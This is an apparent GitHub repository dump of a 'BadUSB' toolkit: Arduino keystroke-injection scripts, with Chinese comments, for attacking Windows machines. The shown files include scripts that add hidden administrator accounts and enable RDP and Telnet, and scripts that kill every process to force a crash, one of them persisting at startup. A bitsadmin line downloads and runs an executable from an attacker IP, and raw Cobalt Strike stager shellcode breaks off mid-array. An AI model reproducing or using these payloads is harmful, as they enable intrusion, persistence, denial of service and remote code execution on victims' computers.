Repository: wangwei39120157028/BadUSB
Branch: master
Commit: 11f55ac48357
Files: 106
Total size: 233.0 KB

Directory structure:
gitextract_e7t_03bd/

├── AddUser_StartService/
│   ├── AddUser_Enable3389(tools).ino
│   └── AddUser_EnableFTP(tools).ino
├── BlueScreen/
│   ├── BlueScreen1(DOS).ino
│   ├── BlueScreen2(DOS).ino
│   ├── BlueScreen3(DOS).ino
│   ├── BlueScreen_xp_win7(DOS).ino
│   ├── DelayedBlueScreen (DOS).ino
│   ├── RegistryWriteBlueScreen (DOS).ino
│   └── RegistryWriteBlueScreenGeneralUse (DOS).ino
├── CobaltStrike_Trojanlinkage/
│   ├── Bitsadmin_TrojanExecution (LinkageWithCS).ino
│   ├── CobaltStrike_Payload/
│   │   ├── payload.c
│   │   ├── payload.cs
│   │   ├── payload.java
│   │   ├── payload.pl
│   │   ├── payload.ps1
│   │   ├── payload.py
│   │   ├── payload.rb
│   │   ├── payload.sct
│   │   ├── payload.txt
│   │   └── payload.vba
│   ├── PSL_TrojanExecution (LinkageWithCS).ino
│   ├── PY_TrojanExecution (LinkageWithCS).ino
│   ├── Pl_TrojanExecution (LinkageWithCS).ino
│   └── Regsvr32_TrojanExecution (LinkageWithCS).ino
├── CodePrincipleInterpretation/
│   ├── ArduinoKeyCodeBase.ino
│   ├── InstructionsOn_setup_loop_Methods.txt
│   └── MSF_TrojanMakingTutorial.txt
├── DNSHijack/
│   ├── DOS_CommandSetMultipleDNS(DNSHijack).ino
│   └── PSL_CommandSetMultipleDNS(DNSHijack).ino
├── LICENSE
├── Linux_Built-inReverseShell/
│   ├── LinuxReverseShell (CodeExecution).ino
│   ├── LinuxReverseShell(BashShell).ino
│   └── LinuxReverseShell(PerlShell).ino
├── MSF_Trojanlinkage/
│   ├── Shell_TrojanGenerationConfiguration.txt
│   ├── shell.apk
│   ├── shell.asp
│   ├── shell.aspx
│   ├── shell.elf
│   ├── shell.jar
│   ├── shell.jsp
│   ├── shell.macho
│   ├── shell.php
│   ├── shell.pl
│   ├── shell.psl
│   ├── shell.py
│   ├── shell.sh
│   └── shell.war
├── OSX_Built-inReverseShell/
│   ├── OSX_SystemReverseConnection (dns_shell).ino
│   ├── OSX_SystemReverseConnection (perl_shell).ino
│   └── OSX_SystemReverseConnection (ruby_shell).ino
├── PSL_FullScreen-HACKED/
│   ├── FullScreenHackedv0/
│   │   ├── FullScreenHackedv/
│   │   │   └── FullScreenHackedv.ino
│   │   └── get.ps1
│   ├── FullScreenHackedv2/
│   │   ├── FullScreenHackedv2.ino
│   │   └── wall.ps1
│   └── FullScreenHackedv3[慎用]/
│       ├── FullScreenHackedv3/
│       │   └── FullScreenHackedv3.ino
│       └── get.ps1
├── README.cn.md
├── README.md
├── RunProgramOn_UDrive_ExpandScopeOfIntrusion/
│   ├── UdiskRun/
│   │   └── UdiskRun.ino
│   ├── UdiskRunv2/
│   │   └── UdiskRunv2.ino
│   └── UdiskRunv3/
│       └── UdiskRunv3.ino
├── Site_AWord_IntrusionCode/
│   ├── AspSentenceTrojanWrite(webServerVersion).ino
│   ├── AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino
│   ├── AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino
│   ├── AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino
│   ├── AspxSentenceTrojanWrite(webServerVersion).ino
│   ├── JspSentenceTrojanWritten (JSP_websiteServerUse).ino
│   ├── JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino
│   ├── PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino
│   ├── PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino
│   └── PHP_TrojanWrite(usedByPHP_websiteServer).ino
├── SpecificFunctionCode/
│   ├── AddUserCode(Tools).ino
│   ├── Alt-f4_Loop.ino
│   ├── ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino
│   ├── EnablePSL_RemoteConnection(Tools).ino
│   ├── ForceShutDownCommand(Tool).ino
│   ├── ForcedDeletionOf360Processes(Tools).ino
│   ├── Hide_CMD_Window(Display).ino
│   ├── MouseKeepsMoving(Tools).ino
│   ├── OpenPort445.ino
│   ├── OpenSpecified_webPage.ino
│   ├── ShiftBackdoor.ino
│   ├── SimplyChangeAllUsersPasswords(TrickItem).ino
│   ├── SimplyShutDownMachine(TrickItem).ino
│   └── TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino
├── TrojanDownloader/
│   ├── CERTUTIL_DownLoader/
│   │   └── CERTUTIL_DownLoader_MSF.ino
│   ├── FTP_DownLoader/
│   │   └── FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino
│   ├── JAVA_DownLoader/
│   │   ├── JavaTrojanWrite(TargetEnvironmentRunJava).ino
│   │   └── server.java
│   ├── PSL_DownLoader/
│   │   ├── Downloa_PSL_Trojan-Execute_aSecondTime.ino
│   │   ├── LinkServer_MSF_PSL_Download.ino
│   │   ├── LinkServer_PSL_Download.ino
│   │   ├── PSL_DownLoader0.ino
│   │   ├── PSL_DownLoader1.ino
│   │   ├── PSL_DownLoader2.ino
│   │   ├── PSL_DownLoader3.ino
│   │   ├── PSL_DownLoader4.ino
│   │   ├── PSL_Downloader_Win&Linux_General.ino
│   │   └── PSL_Writes_Bounces.ino
│   └── PY_DownLoader/
│       ├── PyShellServer.py
│       └── Py_TrojanWrite(TargetEnvironmentRunPython).ino
├── Ubuntu_InformationGathering/
│   ├── BasicTerminalCommandsForUbuntu(Display).ino
│   └── UbuntuInformationCollectionTXT_File(Information).ino
├── WiFi_ConnectionTrojan/
│   └── ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino
└── WiFi_PasswordAcquisition/
    ├── WiFiPasswordCapture(tool).ino
    └── WiFiPasswordExport(tool).ino

================================================
FILE CONTENTS
================================================

================================================
FILE: AddUser_StartService/AddUser_Enable3389(tools).ino
================================================
void setup(){
  Keyboard.begin();
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.println("POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS");
  Keyboard.println();
  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
  delay(500);
  Keyboard.println("CMD");
  delay(50);
  Keyboard.println("CMD /C NET USER ADMIN ADMIN /ADD&NET LOCALGROUP ADMINISTRATORS ADMIN /ADD");
  delay(50)
  Keyboard.println("ECHO wINDOWS rEGISTRY eDITOR vERSION 5.00>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL sERVER]>>3389.REG&&ECHO \"FdENYtscCONNECTIONS\"=DWORD:00000000>>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL sERVER\\wDS\\RDPWD\\tDS\\TCP]>>3389.REG&&ECHO \"pORTnUMBER\"=DWORD:00000D3D>>3389.REG&&ECHO [hkey_local_machine\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL sERVER\\wINsTATIONS\\rdp-tCP]>>3389.REG&&ECHO \"pORTnUMBER\"=DWORD:00000D3D>>3389.REG");
  delay(100);
  Keyboard.println("REGEDIT /S 3389.REG&&DEL 3389.REG&&EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}

void loop(){
}


================================================
FILE: AddUser_StartService/AddUser_EnableFTP(tools).ino
================================================
void setup() {
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("CMD");
  Keyboard.println();
  delay(500);
  Keyboard.println("COLOR A&&CLS");
  Keyboard.println("NET USER 123 123 /ADD");
  delay(500);
  Keyboard.println("NET LOCALGROUP ADMINISTRATORS 123 /ADD&&REG ADD \"hkey_local_machine\\software\\mICROSOFT\\wINDOWS nt\\cURRENTvERSION\\wINLOGON\\sPECIALaCCOUNTS\\uSERlIST\" /V 123 /D 0 /T reg_dword /F&&REG ADD \"hkey_local_machine\\software\\microsoft\\tELNETsERVER\\1.0\" /V ntlm /D 0 /T reg_doword/f&&reg add \"hklm\\system\\cURRENTcONTROLsET\\cONTRAL\\lSA\" /V \"FORCEGUEST\" /T reg_dword /D 0 /F");
  delay(1000);
  Keyboard.println("SC CONFIG TLNTSVR START= AUTO");
  delay(500);
  Keyboard.println("NET START TELNET");
  delay(500);
  Keyboard.println("CLS&&ECHO hACKED fINISH");
    Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}
void loop() {
}


================================================
FILE: BlueScreen/BlueScreen1(DOS).ino
================================================
//CMD蓝屏代码
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f&cmd /c for /f %I in ('wmic process get Name')do (wmic process where Name=\"%I\" delete)");
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: BlueScreen/BlueScreen2(DOS).ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(20000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("POWERSHELL -NOP -W HIDDEN -C \"sTART-pROCESS -fILEpATH CMD.EXE \' /C FOR /F %i IN(''WMIC PROCESS GET nAME\'\')DO (WMIC PROCESS WHERE nAME=\"%i\" DELETE)\' -vERB RUNAS\"");
  Keyboard.println();
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
  //bypass uac   绕过UAC 这一段不会用的不要用,否则后果自负
  //Keyboard.press(KEY_LEFT_ALT);
  //Keyboard.print('y');
  //Keyboard.release(KEY_LEFT_ALT);
}


================================================
FILE: BlueScreen/BlueScreen3(DOS).ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
   Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.println("CMD /C FOR /F %i IN ('WMIC PROCESS GET nAME')DO (WMIC PROCESS WHERE nAME=\"%i\" DELETE)");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: BlueScreen/BlueScreen_xp_win7(DOS).ino
================================================
#include<Keyboard.h>

void setup() 
{
  //初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop()//循环
{
}

================================================
FILE: BlueScreen/DelayedBlueScreen (DOS).ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("cmd.exe /k reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");
  delay(500);
  Keyboard.println("echo.if \"%1\" == \"h\" goto begin>c:\\1.bat&echo.mshta vbscript:createobject(\"wscript.shell\").run(\"%~nx0 h\",0)(window.close)^&^&exit>>c:\\1.bat&echo.:begin>>c:\\1.bat&echo.ping ^-n 3 127.1^>nul^&for /f %%I in ('wmic process get Name')do (wmic process where Name=\"%%I\" delete)^>c:\\1.vbs^&c:\\1.vbs>>c:\\1.bat&exit");
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("c:\\1.bat");
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: BlueScreen/RegistryWriteBlueScreen (DOS).ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD /C CD %USERPROFILE%\\aPPdATA\\rOAMING\\mICROSOFT\\wINDOWS\\sTART mENU\\pROGRAMS\\sTARTUP&ECHO FOR /F %%i IN (\'WMIC PROCESS GET NAME\')DO (WMIC PROCESS WHERE nAME=\"%%I\" DELETE)>SYSTEM.BAT&SHUTDOWN -R -F -T 0");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: BlueScreen/RegistryWriteBlueScreenGeneralUse (DOS).ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}




================================================
FILE: CobaltStrike_Trojanlinkage/Bitsadmin_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("cmd.exe /c bitsadmin /transfer 270c http://192.168.154.131:80/b %APPDATA%\270c.exe&%APPDATA%\270c.exe&del %APPDATA%\270c.exe");  //访问Web Delivery-bitsadmin，恶意网址按照实际更改
  delay(200); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.c
================================================
/* length: 800 bytes */
unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x77\x4c\x61\x38\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00";


================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.cs
================================================
/* length: 800 bytes */
byte[] buf = new byte[800] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x74, 0x4f, 0x57, 0x42, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 